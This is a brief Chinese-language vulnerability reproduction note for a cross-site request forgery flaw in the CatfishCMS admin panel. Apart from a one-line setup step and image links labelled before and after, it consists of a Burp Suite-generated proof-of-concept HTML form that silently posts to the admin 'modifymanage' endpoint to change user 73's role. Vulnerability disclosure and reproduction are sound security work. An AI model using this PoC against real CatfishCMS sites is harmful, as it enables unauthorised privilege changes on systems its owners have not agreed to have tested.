001-CatfishCMS后台csrf.md

660 B / 2021-07-17 00:01:24
    # CatfishCMS后台csrf

**复现过程**

首先需要登录后台


```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://url/index.php/admin/index/modifymanage.html?c=73" method="POST">
      <input type="hidden" name="uid" value="73" />
      <input type="hidden" name="juese" value="3" />
      <input type="hidden" name="verification" value="05f176843c20e12c1364e80b9869ac17" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

修改前

![](images/15889446053876.png)


修改后

![](images/15889446138818.png)